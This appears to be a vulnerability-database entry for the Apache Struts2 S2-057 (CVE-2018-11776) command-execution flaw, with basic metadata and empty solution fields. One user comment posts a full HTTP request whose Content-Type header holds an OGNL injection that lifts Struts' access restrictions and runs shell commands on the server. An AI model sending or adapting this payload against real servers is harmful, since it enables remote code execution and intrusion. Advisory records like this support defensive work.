Apache Struts2 S2-057 (CVE-2018-11776)

Basic Fields

SSV ID:
SSV-97497
Find Time:
Unknown
Submit Time:
2018-08-22
Level:
Category:
Command execution
Component:
Apache Struts
Author:
Man Yue Mo
Submitter:
Knownsec
CVE-ID:
CVE-2018-11776

Source

Detail

PoC (pocsuite plugin)

Reference Linking

Solutions

Temporary Solutions

No temporary solution available

Official Solution

Defense Solutions

No defense solution available

Popularity 8947
All Comments (2)

  • GET /index.action HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) Accept: */* Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows--2017'}:{'/bin/bash','-c','echo linux--2017'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Host: 127.0.0.1:8080 Connection: Keep-Alive
    2F
  • Where is the PoC?
    1F
